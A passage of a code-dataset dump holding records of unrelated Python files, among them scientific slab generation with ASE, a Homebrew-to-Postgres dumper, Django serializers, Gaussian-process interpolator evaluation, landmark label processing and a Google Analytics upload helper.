options.dataset:\n datasets = ALL_DOMAINS\n else:\n datasets = [options.dataset]\n\n for d in datasets:\n ds = compute(d)\n if not options.latex:\n print(d, ' '.join(['%s = %.2s' % (k, v) for (k, v) in sorted(six.iteritems(ds))]))\n else:\n print('& '.join([d] + ['%.1f' % v for (k, v) in 
sorted(six.iteritems(ds))]))\n","sub_path":"bin/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"382916784","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom ase import Atoms\nimport ase.io \nfrom ase.build import molecule\nfrom ase.build import bulk \nfrom ase.build import surface\nfrom ase.build import add_vacuum \nfrom ase.build import fcc111, bcc110, hcp0001\nfrom ase.constraints import FixAtoms\nimport subprocess\n\n\n## Crystal structure of elements: from https://en.wikipedia.org/wiki/Periodic_table_(crystal_structure)\nbcc = ['V', 'Cr', 'Mn', 'Fe', 'Nb', 'Pb']\nhcp = ['Mg', 'Sc', 'Ti', 'Co', 'Zn', 'Y', 'Zr', 'Tc', 'Ru', 'Cd', 'Hf', 'Re', 'Os']\nfcc = ['Al', 'Ca', 'Ni', 'Cu', 'Rh', 'Pd', 'Ag', 'Ir', 'Pt', 'Au']\n\n### Metal Bulk structures from DFT calculations without vdw\n## {element:[E_bulk, Natom_in_the_bulk, lattice_a, lattice_c]\n## 'Bulks are conventional cells, not primitive cells'\n\ndict_metals = { \n'Ag':(-10.88004463,4,4.1423472817),\n'Co':(-14.06155869,2,2.4908062578,4.0275560997),\n'Cu':(-14.91182926,4,3.6339719976),\n'Fe':(-16.47105782,2,2.8346922247),\n'Ir':(-35.00402169,4,3.8852086642),\n'Ni':(-21.86901226,4,3.5177809803),\n'Pd':(-20.864555,4,3.9374172967),\n'Pt':(-24.39436715,4,3.9669414218),\n'Rh':(-29.10896058,4,3.8241655305),\n'Ru':(-18.49439863,2,2.7126893229,4.2897522328),\n}\n\n\ndef bottom(file_in):\n '''This function is used to pull the cetered atoms (from ASE) back to the bottom. '''\n f = open(file_in, 'r')\n lines = f.readlines()\n f.close()\n coord = [float(line.rstrip().split()[2]) for line in lines[9:]]\n bottom = min(coord)\n out_put = open(file_in + '_bottomed', 'w')\n out_put.writelines(i for i in lines[0:9])\n for line in lines[9:]:\n infor = line.rstrip().split()\n infor[2] = str(float(infor[2]) - bottom)\n out_put.write(' '.join(infor) + '\\n')\n out_put.close() \n\n\ndef cssm(metal, data_dict): # cleave_stable_surfaces_from_metals \n name = 'POSCAR_' + metal\n if metal in bcc: # For bcc metals, cleave 110 surface \n lattice_a = float(data_dict.get(metal)[2])\n for i in range(1, 4):\n name_out = name + '_' + str(i)\n slab = bcc110(metal, a=lattice_a, size=(i, i, 4), vacuum = 7.5)\n '''(i,i,4) means repeat i i 4 in x y and z directions. 
vacuum will be 7.5 * 2 because it was added on the two sides.''' \n constraint_l = FixAtoms(indices=[atom.index for atom in slab if atom.index < i*i*2])\n slab.set_constraint(constraint_l)\n ase.io.write(name_out, slab, format='vasp')\n ### Add the element line to the POSCAR file ###\n subprocess.call(['sed -i ' + '\\'5a' + metal + '\\' ' + name_out], shell = True)\n bottom(name_out) \n elif metal in hcp: # For hcp metals, cleave 0001 surface \n lattice_a, lattice_c = [float(i) for i in data_dict.get(metal)[2:]]\n for i in range(1,4):\n name_out = name + '_' + str(i)\n slab = hcp0001(metal, a = lattice_a, c = lattice_c, size = (i, i, 4), vacuum = 7.5)\n constraint_l = FixAtoms(indices=[atom.index for atom in slab if atom.index < i*i*2])\n slab.set_constraint(constraint_l)\n ase.io.write(name_out, slab, format='vasp')\n subprocess.call(['sed -i ' + '\\'5a' + metal + '\\' ' + name_out], shell = True )\n bottom(name_out) \n \n elif metal in fcc: # For fcc metals, cleave 111 surface\n lattice_a = float(data_dict.get(metal)[2])\n for i in range(1,4):\n name_out = name + '_' + str(i)\n slab = fcc111(metal, a = lattice_a, size = (i, i, 4), vacuum = 7.5)\n# slab.center(vacuum=7.5, axis = 2)\n constraint_l = FixAtoms(indices=[atom.index for atom in slab if atom.index < i*i*2])\n slab.set_constraint(constraint_l)\n ase.io.write(name_out, slab, format='vasp')\n subprocess.call(['sed -i ' + '\\'5a' + metal + '\\' ' + name_out], shell = True )\n bottom(name_out) \n else: \n print('Please add your element in the crystal structure lists: bcc, hcp, and fcc') \n\n\nfor metal in dict_metals.keys():\n cssm(metal, dict_metals)","sub_path":"cssm.py","file_name":"cssm.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"598790851","text":"#!/usr/bin/env python3\n\nimport argparse\nimport subprocess\nimport sys\n\nparser = argparse.ArgumentParser(description='Dump the output of `brew list` to an SQL database.')\nparser.add_argument('action', choices=['dump', 'ls'])\n\nargs = parser.parse_args()\n\nif args.action == 'dump':\n subprocess.run(['bash', '-c', '''su - user -c \"psql -c 'DELETE FROM schema_.packages;'\"'''], check=True)\n subprocess.run(['bash', '-c', r\"\"\"brew list -1 --versions | awk '{ print \"INSERT INTO schema_.packages VALUES ('\\\\\\''\"$1\"'\\\\\\'', '\\\\\\''\"$2\"'\\\\\\'');\" }' | xargs -I % su - user -c 'psql -c \"%\"'\"\"\"], check=True)\nelif args.action == 'ls':\n subprocess.run(['bash', '-c', '''su - user -c \"psql -c 'SELECT * from schema_.packages;'\"'''], check=True)","sub_path":"Packages/dumper/dumper.py","file_name":"dumper.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"32875126","text":"from application import db\nfrom application.models import Base\nfrom sqlalchemy.sql import text\n\nclass Product(Base):\n\n name = db.Column(db.String(144), nullable=False)\n producer = db.Column(db.String(144), nullable=False)\n public = db.Column(db.Boolean, nullable=False)\n\n account_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)\n\n def __init__(self, name, producer):\n self.name = name\n self.producer = producer\n self.public = False\n\n @staticmethod\n def remove_product(id):\n print(\"poistetaan: \" + id)\n stmt = text(\"DELETE FROM product WHERE (Product.id = :id)\").params(id=id)\n 
db.engine.execute(stmt)","sub_path":"application/products/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"493566102","text":"\"\"\"Reads and saves csv data to json in organized format\n\"\"\"\nimport json\nimport os\nfrom decimal import Decimal\n\n\ndef get_disease_data(details):\n \"\"\"returns only necessary disease data\n\n Arguments:\n details {list} -- details of each county\n \"\"\"\n return {\n \"state_name\": details[0].upper(),\n \"name\": details[1].upper(),\n \"death_rates\": float(Decimal(details[3]))\n }\n\n\ndef get_census_data(details):\n \"\"\"returns only required data from census\n\n Arguments:\n details {list} -- details of each county\n \"\"\"\n try:\n return {\n \"state_name\": details[5].split('-')[1].strip().upper(),\n \"name\": details[6].upper().replace(' COUNTY', ''),\n \"population\": int(details[7].split('(')[0]),\n \"area\": float(Decimal(details[9].split('(')[0])),\n }\n except IndexError:\n return None\n\n\ndef get_state_data(details):\n \"\"\"returns bordering states for a state\n\n Arguments:\n details {list} -- details of each state\n \"\"\"\n return {\"name\": details[0].upper(), \"bordering_states\": details[1:-1]}\n\n\ndef aggregate_county_data(county, census_data):\n \"\"\"aggregates county data for given county\n\n Arguments:\n county {string}\n census_data {list}\n \"\"\"\n for item in census_data:\n if county[\"name\"] in item[\"name\"] and item[\"state_name\"] == county[\"state_name\"]:\n county.update(item)\n return county\n\n\ndef get_county_data_by_state(state, disease_data, census_data):\n \"\"\"gets county data for given state\n\n Arguments:\n state {[type]} -- [description]\n disease_data {[type]} -- [description]\n census_data {[type]} -- [description]\n \"\"\"\n return [\n aggregate_county_data(county, census_data) for county in disease_data\n if county[\"state_name\"] == state[\"name\"]\n ]\n\n\ndef aggregate(disease_data, census_data, state_data):\n \"\"\"aggregates all county data\n\n Arguments:\n disease_data {list}\n census_data {list}\n state_data {list}\n \"\"\"\n return {\n state[\"name\"]: {\n \"Counties\":\n get_county_data_by_state(state, disease_data, census_data),\n \"Bordering States\":\n state[\"bordering_states\"]\n }\n for state in state_data\n }\n\n\ndef main():\n \"\"\"Organizes data into /outputs\n \"\"\"\n disease_data_fp = os.path.join(\"data\", \"usa_heartrate_by_county.csv\")\n census_data_fp = os.path.join(\"data\", \"usa_population_area_by_county.csv\")\n state_data_fp = os.path.join(\"data\", \"usa_bordering_states.csv\")\n output_fp = os.path.join(\"output\", \"organized_data.json\")\n\n with open(disease_data_fp, \"r\") as fobj:\n disease_data = [\n get_disease_data(i.strip().split(',')) for i in fobj.readlines()\n ]\n with open(census_data_fp, \"r\") as fobj:\n census_data = [\n get_census_data(i.strip().split(',')) for i in fobj.readlines()\n if get_census_data(i.strip().split(',')) is not None\n ]\n with open(state_data_fp) as fobj:\n state_data = [\n get_state_data(i.strip().split(',')) for i in fobj.readlines()\n ]\n json.dump(\n aggregate(disease_data, census_data, state_data), open(output_fp, \"w\"))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/preprocessing/organize_data.py","file_name":"organize_data.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
+{"seq_id":"238110826","text":"#! /usr/bin/env python3\n\nimport numpy as np\nimport argparse\nimport os\nimport sys\nimport json\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF, WhiteKernel, ConstantKernel as C\nfrom scipy.linalg import cholesky, cho_solve\n\nparser = argparse.ArgumentParser(description=\"Evaluate a single interpolator, specified by `--interp-angle` and `--interp-time`, on the parameters given in `--parameter-file`\")\nparser.add_argument(\"--interp-angle\", help=\"Which angle (of 0, 30, 45, 60, 75, 90) to evaluate\")\nparser.add_argument(\"--interp-time\", help=\"Which time (of the set values at which the interpolators are trained) to use\")\nparser.add_argument(\"--grid-file\", help=\"Filename for the parameter grid\")\nparser.add_argument(\"--index-file\", help=\"Name of file containing the indices in the grid that correspond to `--interp-angle`\")\nparser.add_argument(\"--output-directory\", help=\"File to write magnitudes to\")\nparser.add_argument(\"--band\", help=\"Band to evaluate\")\nparser.add_argument(\"--n-samples-per-eval\", type=int, default=10000, help=\"Number of points to evaluate in a given interpolator call (prevents the GPR from using too much memory at once)\")\nargs = parser.parse_args()\n\n# In general this will already have been made by partition_grid.py, but it doesn't hurt to check\nif not os.path.exists(args.output_directory):\n os.makedirs(args.output_directory)\n\n# wavelengths corresponding to bands\nwavelengths = {\n \"g\":477.56,\n \"r\":612.95,\n \"i\":748.46,\n \"z\":865.78,\n \"y\":960.31,\n \"J\":1235.0,\n \"H\":1662.0,\n \"K\":2159.0\n}\n\n# _load_gp() and _model_predict() are stolen from Marko's code\ndef _load_gp(fname_base):\n kernel=None\n with open(fname_base + \".json\",'r') as f:\n my_json = json.load(f)\n my_X = np.loadtxt(fname_base + \"_X.dat\")\n my_y = np.loadtxt(fname_base + \"_y.dat\")\n my_alpha = np.loadtxt(fname_base + \"_alpha.dat\")\n dict_params = my_json['kernel_params']\n theta = np.array(my_json['kernel']).astype('float')\n theta = np.power(np.e, theta)\n kernel = WhiteKernel(theta[0]) + theta[1]*RBF(length_scale=theta[2:])\n gp = GaussianProcessRegressor(kernel=kernel,n_restarts_optimizer=0)\n gp.kernel_ = kernel\n dict_params_eval = {}\n for name in dict_params:\n if not('length' in name or 'constant' in name):\n continue\n if name ==\"k2__k2__length_scale\":\n one_space = ' '.join(dict_params[name].split())\n dict_params_eval[name] = eval(one_space.replace(' ',','))\n else:\n dict_params_eval[name] = eval(dict_params[name])\n gp.kernel_.set_params(**dict_params_eval)\n gp.X_train_ = my_X\n gp.y_train_ = my_y\n gp.alpha_ = my_alpha\n gp._y_train_std = float(my_json['y_train_std'])\n gp._y_train_mean = float(my_json['y_train_mean'])\n return gp\n\ndef _model_predict(model, inputs):\n K = model.kernel_(model.X_train_)\n K[np.diag_indices_from(K)] += model.alpha\n model.L_ = cholesky(K, lower=True) # recalculating L matrix since this is what makes the pickled models bulky\n model._K_inv = None # has to be set to None so the GP knows to re-calculate matrices used for uncertainty\n K_trans = model.kernel_(inputs, model.X_train_)\n pred = K_trans.dot(model.alpha_)\n pred = model._y_train_std * pred + model._y_train_mean\n v = cho_solve((model.L_, True), K_trans.T)\n y_cov = model.kernel_(inputs) - K_trans.dot(v)\n err = np.sqrt(np.diag(y_cov))\n \n mags = _log_lums_to_mags(pred)\n mags_error = 2.5 * err\n\n return mags, mags_error\n\ndef 
_log_lums_to_mags(log_lums):\n d = 3.086e18 # parsec in cm\n d *= 10 # distance of 10 pc\n log_flux = log_lums - np.log10(4.0 * np.pi * d**2)\n mags = -48.6 - 2.5 * log_flux\n return mags\n\n# load the grid\ngrid = np.atleast_2d(np.loadtxt(args.grid_file))\nparams = np.empty((grid.shape[0], 5))\nparams[:,:4] = grid[:,3:7] # take everything but angle\nparams[:,4] = wavelengths[args.band]\n\n# load the grid indices if they exist, exiting if it has size 0\nif args.index_file is None: # if there is no index file, assume we're evaluating the interpolator at every index\n indices = np.arange(grid.shape[0]).astype(int)\nelse:\n indices = np.loadtxt(args.index_file).astype(int)\nif indices.size == 0:\n exit()\n\nparams = params[indices]\n\n# location of trained interpolators\ninterp_loc = os.environ[\"INTERP_LOC\"]\nif interp_loc[-1] != \"/\":\n interp_loc += \"/\"\ninterp_loc += \"surrogate_data/2021_Wollaeger_TorusPeanut/\"\n\n# load the interpolator\ninterp_name = interp_loc + \"theta\" + (\"00\" if args.interp_angle == \"0\" else args.interp_angle) + \"deg/t_\" + args.interp_time + \"_days/model\"\nmodel = _load_gp(interp_name)\n\n# break the evaluation into smaller pieces to avoid using too much RAM\nif params.shape[0] > args.n_samples_per_eval:\n params_chunk_list = np.array_split(params, int(params.shape[0] / args.n_samples_per_eval))\nelse:\n params_chunk_list = [params]\n\nmags_full = np.empty(0)\nmags_err_full = np.empty(0)\n\nfor chunk in params_chunk_list:\n if chunk.size == 0:\n continue\n # evaluate the interpolator\n mags, mags_err = _model_predict(model, chunk)\n mags_full = np.append(mags_full, mags)\n mags_err_full = np.append(mags_err_full, mags_err)\n\n# fill an array with the results\noutput_array = np.empty((params.shape[0], 2))\noutput_array[:,0] = mags_full\noutput_array[:,1] = mags_err_full\n\n# write the output to a file\nnp.savetxt(args.output_directory + (\"/\" if args.output_directory[-1] != \"/\" else \"\") + \"eval_interp_{0}_{1}_{2}.dat\".format(args.interp_time, args.interp_angle, args.band), output_array)\n","sub_path":"bin/evaluate_interpolator.py","file_name":"evaluate_interpolator.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"533762276","text":"# -*- coding: utf-8 -*-\nimport os\nimport numpy as np\nimport cv2\nimport shutil\nimport sys\n\n\ndebug = False\n\n\nclass ImageDate():\n def __init__(self, line, img_dir):\n line = line.strip().split()\n \"\"\"\n label(147) = [136(68*2) points] + [4 bbox] + [6 attributes] + saveName\n \"\"\"\n if len(line) != 147:\n import pdb\n pdb.set_trace()\n self.list = line\n self.landmark = np.asarray(\n list(map(float, line[:136])), dtype=np.float32).reshape(-1, 2)\n self.landmark_lip = self.landmark[48:]\n # print(\"lip land num: \", len(self.landmark_lip))\n self.box = np.asarray(list(map(int, line[136:140])), dtype=np.int32)\n self.flag = list(map(int, line[140:146]))\n if img_dir == \"none\":\n self.path = line[-1]\n else:\n self.path = os.path.join(img_dir, line[-1])\n self.img = None\n self.new_box = []\n\n def extract_lip(self):\n # ========画像を顔枠ら辺でcropし、輪郭点を調査========\n # crop枠のサイズ\n xy = np.min(self.landmark_lip, axis=0).astype(np.int32)\n zz = np.max(self.landmark_lip, axis=0).astype(np.int32)\n wh = zz - xy + 1\n center = (xy + wh / 2).astype(np.int32)\n boxsize = int(np.max(wh) * 1.2)\n # crop枠の左上を原点とした中心までの座標\n xy = center - boxsize // 2\n x1, y1 = xy\n x2, y2 = xy + boxsize\n try:\n img = cv2.imread(self.path)\n 
height, width, _ = img.shape\n except Exception as e:\n import pdb\n pdb.set_trace()\n # crop枠の左上 or 画像の左上縁\n dx = max(0, -x1)\n dy = max(0, -y1)\n x1 = max(0, x1)\n y1 = max(0, y1)\n xy = (x1, y1)\n\n # crop枠の右下 or 画像の右下縁\n edx = max(0, x2 - width)\n edy = max(0, y2 - height)\n x2 = min(width, x2)\n y2 = min(height, y2)\n\n self.new_box = [x1, y1, x2, y2]\n\n if debug:\n # 表示して確認\n img_tmp = img.copy()\n cv2.rectangle(img, (self.new_box[0], self.new_box[1]),\n (self.new_box[2], self.new_box[3]), (255, 0, 0), 1, 1)\n for x, y in (self.landmark_lip + 0.5).astype(np.int32):\n cv2.circle(img_tmp, (x, y), 1, (255, 0, 0))\n cv2.imwrite(\"./sample_lip.jpg\", img_tmp)\n # import pdb;pdb.set_trace()\n\n def save_data(self):\n # attributeは特にいじらず保存\n attributes = self.flag\n attributes = np.asarray(attributes, dtype=np.int32)\n attributes_str = ' '.join(list(map(str, attributes)))\n\n bb_str = ' '.join(list(map(str, self.new_box)))\n self.landmark_lip = self.landmark_lip.astype(np.int32)\n landmark_lip_str = ' '.join(\n list(map(str, self.landmark_lip.reshape(-1).tolist())))\n\n label = '{} {} {} {}\\n'.format(\n landmark_lip_str, bb_str, attributes_str, self.path)\n\n label_line = label.strip().split()\n if debug:\n print(len(label_line))\n print(label)\n if len(label_line) != 51:\n import pdb\n pdb.set_trace()\n\n return label\n\n\nif __name__ == '__main__':\n # change bb and landmark to around lip bb and lip landmark only of base txt label.\n # bedore : label(147) = [136(68*2) points] + [4 bbox] + [6 attributes] + saveName\n # after : label(51) = [40(20*2) points] + [4 bbox] + [6 attributes] + saveName\n if len(sys.argv) == 4:\n base_txt = sys.argv[1]\n # none or img dir path\n # if your label txt include img dir, set none\n img_dir = sys.argv[2]\n save_txt = sys.argv[3]\n else:\n print(\"please set arg(base_txt imgdir save_txt)\")\n exit()\n\n with open(base_txt, 'r') as f:\n lines = f.readlines()\n labels = []\n\n if debug:\n lines = lines[:100]\n print(\"get file num: \", len(lines))\n for i, line in enumerate(lines):\n Img = ImageDate(line, img_dir)\n Img.extract_lip()\n label_txt = Img.save_data()\n labels.append(label_txt)\n if ((i + 1) % 100) == 0:\n print('file: {}/{}'.format(i + 1, len(lines)))\n\n with open(save_txt, 'w') as f:\n for label in labels:\n f.writelines(label)\n\n print(\"processed image num: \", len(labels))\n print('end')\n","sub_path":"data/extract_lip_label.py","file_name":"extract_lip_label.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"273619447","text":"from rest_framework import serializers\nfrom django.db.models import Prefetch\nfrom publish import models\nfrom product.serializers import ProductSerializer\n\n# TODO Need to 최적화 (Nested Serializer)\n\n\nclass LinkingBannerSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.LinkingBanner\n fields = ('ordering', 'title', 'list_thumb_picture',\n 'cover_picture_1',\n 'cover_picture_2',\n 'cover_picture_3',\n 'cover_picture_4',\n 'link_url',\n 'coupon_code',\n 'banner_type',\n 'primary_color',\n 'secondary_color', 'data')\n\n\nclass ProductGroupInLineSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = models.ProductGroup\n fields = ('ordering', 'title',\n 'cover_picture', 'list_thumb_picture',\n 'pk')\n\n\nclass ProductGroupSerializer(serializers.ModelSerializer):\n product_list = ProductSerializer(many=True)\n\n class Meta:\n model = models.ProductGroup\n fields = ('product_list',)\n\n 
@staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(\n 'product_list__category',\n 'product_list__shopee_rating',\n 'product_list__style',\n 'product_list__sub_category',\n 'product_list__store',\n 'product_list__store__age',\n 'product_list__store__primary_style',\n 'product_list__store__secondary_style',\n 'product_list__post__post_image_set',\n 'product_list__color',\n 'product_list__size',\n 'product_list__extra_option',\n 'product_list__favorite_users',\n 'product_list__store__favorite_users',\n 'product_list__store__category',\n 'product_list__product_image_set',\n 'product_list__store__product_category',\n 'product_list__product_options',\n 'product_list__product_options__size',\n 'product_list__product_options__color',\n )\n return queryset\n\n\nclass ProductTagGroupSerializer(serializers.ModelSerializer):\n category = serializers.StringRelatedField(many=False)\n sub_category = serializers.StringRelatedField(many=False)\n color = serializers.StringRelatedField(many=False)\n style = serializers.StringRelatedField(many=False)\n store = serializers.StringRelatedField(many=False)\n pattern = serializers.StringRelatedField(many=False)\n\n class Meta:\n model = models.ProductTagGroup\n fields = ('__str__', 'category', 'sub_category',\n 'color', 'style', 'store', 'pattern')\n\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(\n 'store',\n 'category',\n 'sub_category',\n 'color',\n 'style',\n 'pattern',\n )\n\n return queryset\n\n\nclass MainPagePublishSerializer(serializers.ModelSerializer):\n producttaggroup_set = ProductTagGroupSerializer(many=True)\n\n class Meta:\n model = models.MainPagePublish\n fields = ('producttaggroup_set',)\n\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(\n 'producttaggroup_set',\n 'producttaggroup_set__store',\n 'producttaggroup_set__category',\n 'producttaggroup_set__sub_category',\n 'producttaggroup_set__color',\n 'producttaggroup_set__style',\n )\n\n return queryset\n\n# https://medium.com/quant-five/speed-up-django-nested-foreign-key-serializers-w-prefetch-related-ae7981719d3f\n\n\nclass BannerPublishSerializer(serializers.ModelSerializer):\n productgroup_set = ProductGroupInLineSerializer(read_only=True, many=True)\n linkingbanner_set = LinkingBannerSerializer(read_only=True, many=True)\n\n class Meta:\n model = models.BannerPublish\n fields = ('date', 'productgroup_set', 'linkingbanner_set')\n\n# https://medium.com/quant-five/speed-up-django-nested-foreign-key-serializers-w-prefetch-related-ae7981719d3f\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. 
\"\"\"\n # select_related for \"to-one\" relationships\n # queryset = queryset.prefetch_related(Prefetch(\n # 'postgroup_set',\n # queryset=models.ProductGroup.objects.order_by('ordering')))\n # queryset = queryset.prefetch_related(\n # 'postgroup_set__post_list',\n # 'postgroup_set__post_list__post_image_set',\n # 'postgroup_set__post_list__store',\n # 'postgroup_set__post_list__store__category',\n # 'postgroup_set__post_list__store__primary_style',\n # 'postgroup_set__post_list__store__secondary_style',\n # 'postgroup_set__post_list__store__age',\n # )\n return queryset\n\n\nclass MagazinePublishSerializer(serializers.ModelSerializer):\n postgroup_set = ProductGroupInLineSerializer(read_only=True, many=True)\n\n class Meta:\n model = models.MagazinePublish\n fields = ('date', 'postgroup_set',)\n\n# https://medium.com/quant-five/speed-up-django-nested-foreign-key-serializers-w-prefetch-related-ae7981719d3f\n @staticmethod\n def setup_eager_loading(queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n # select_related for \"to-one\" relationships\n queryset = queryset.prefetch_related(Prefetch(\n 'postgroup_set',\n queryset=models.ProductGroup.objects.order_by('ordering')))\n queryset = queryset.prefetch_related(\n 'postgroup_set__post_list',\n 'postgroup_set__post_list__post_image_set',\n 'postgroup_set__post_list__store',\n 'postgroup_set__post_list__store__category',\n 'postgroup_set__post_list__store__primary_style',\n 'postgroup_set__post_list__store__secondary_style',\n 'postgroup_set__post_list__store__age',\n )\n\n return queryset\n","sub_path":"app/publish/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"532341332","text":"\"\"\"Plot the history of the force coefficients.\"\"\"\n\nimport math\nfrom matplotlib import pyplot\nimport numpy\nimport pathlib\n\nimport petibmpy\n\nimport rodney\n\n\nargs = rodney.parse_command_line()\n\n# Load forces from file.\nsimudir = pathlib.Path(__file__).absolute().parents[1]\ndatadir = simudir / 'output'\nfilepath = datadir / 'forces-0.txt'\nt, fx, fy = petibmpy.read_forces(filepath)\n\n# Convert forces to force coefficients.\nrho, U_inf, D = 1.0, 1.0, 1.0\ncoeff = 1 / (0.5 * rho * U_inf**2 * D)\ncd, cl = petibmpy.get_force_coefficients(fx, fy, coeff=coeff)\n\nprint(f'Final value of the drag coefficient: CD = {cd[-1]:.4f}')\ntime_limits = (40.0, 50.0)\ncd_, = petibmpy.get_time_averaged_values(t, cd, limits=time_limits)\nprint(f'Time-averaged {time_limits} drag coefficient: = {cd_:.4f}')\n\n# Plot the history of the force coefficients.\npyplot.rc('font', family='serif', size=14)\nfig, ax = pyplot.subplots(figsize=(8.0, 4.0))\nax.set_xlabel('Non-dimensional time')\nax.set_ylabel('Force coefficients')\nax.plot(t, cd, label='$C_D$', color='black', linestyle='-')\nax.plot(t, cl, label='$C_L$', color='black', linestyle='--')\nax.legend(frameon=False)\nax.set_xlim(t[0], t[-1])\nax.set_ylim(-3.0, 3.0)\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nfig.tight_layout()\n\nif args.save_figures:\n # Save the figure.\n figdir = simudir / 'figures'\n figdir.mkdir(parents=True, exist_ok=True)\n filepath = figdir / 'force_coefficients.png'\n fig.savefig(filepath, dpi=300, bbox_inches='tight')\n\nif args.show_figures:\n 
pyplot.show()\n","sub_path":"runs/cylinder2dRe40/500_markers/scripts/plot_force_coefficients.py","file_name":"plot_force_coefficients.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"106062442","text":"from apiclient.http import MediaFileUpload\nimport time\nfrom apiclient.discovery import build\nfrom google.oauth2 import service_account\n\n\nclass GAnalyticsUpload:\n def __init__(self, path_to_json, account_id, web_property_id, custom_data_source_id):\n self.KEY_FILE_LOCATION = path_to_json\n self.SCOPES = [\"https://www.googleapis.com/auth/analytics\"]\n self.account_id = account_id\n self.web_property_id = web_property_id\n self.custom_data_source_id = custom_data_source_id\n self.credentials = service_account.Credentials.from_service_account_file(path_to_json)\n self.scoped_credentials = self.credentials.with_scopes(self.SCOPES)\n self.analytics = build('analytics', 'v3', credentials=self.scoped_credentials)\n \n def upload_data(self, data_frame, path_to_csv, file_name):\n \"\"\"\n ga:date - дата\n ga:medium - канал\n ga:source - источник\n ga:adClicks - клики\n ga:adCost - стоимость\n ga:impressions - показы\n ga:adContent - содержание объявления\n ga:campaign - кампания\n ga:keyword - ключевое слово\n \n \"\"\"\n data_frame.to_csv(path_to_csv+file_name, decimal=\".\", index=False)\n media = MediaFileUpload(path_to_csv+file_name, mimetype='application/octet-stream', resumable=False)\n daily_upload = self.analytics.management().uploads().uploadData(accountId=self.account_id,\n webPropertyId=self.web_property_id,\n customDataSourceId=self.custom_data_source_id,\n media_body=media).execute()\n daily_upload_id = daily_upload['id']\n status, message = self.check_upload_status(daily_upload_id)\n return status, message\n \n def check_upload_status(self, daily_upload_id):\n uploads = self.analytics.management().uploads().list(accountId=self.account_id,\n webPropertyId=self.web_property_id,\n customDataSourceId=self.custom_data_source_id).execute()\n for upload in uploads['items']:\n if upload['id'] == daily_upload_id:\n status = upload['status']\n if status == 'FAILED':\n return status, upload['errors']\n elif status in ['PENDING', 'DELETING']:\n time.sleep(5)\n return self.check_upload_status(daily_upload_id)\n else:\n return status, \"success\"\n\n","sub_path":"analytics/connectors/_GAnalyticsUpload.py","file_name":"_GAnalyticsUpload.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"334424112","text":"from evalAlign import _get_BLEU_scores, _get_bp\nfrom preprocess import preprocess\nimport argparse\n\ndef main(args):\n with open('bonus3_nmt_translations.txt') as f1, open('/u/cs401/A2_SMT/data/Hansard/Testing/Task5.e') as f2, open('/u/cs401/A2_SMT/data/Hansard/Testing/Task5.google.e') as f3:\n eng_decoded = [preprocess(sent, 'e') for sent in f1.read().splitlines()]\n eng = [preprocess(sent, 'e') for sent in f2.read().splitlines()]\n google_refs = [preprocess(sent, 'e') for sent in f3.read().splitlines()]\n\n f = open(\"bonus3_Task5.txt\", 'w+')\n f.write(\"-\" * 10 + \"Evaluation START\" + \"-\" * 10 + \"\\n\")\n\n all_evals = []\n bps = [_get_bp(cand, [hansard_ref, google_ref]) for cand, hansard_ref, google_ref in zip(eng_decoded, eng, google_refs)]\n\n for n in range(1, 4):\n f.write(f\"\\nBLEU scores with N-gram (n) = {n}: \")\n if n == 1:\n evals = [bp*pn for (pn, bp) in 
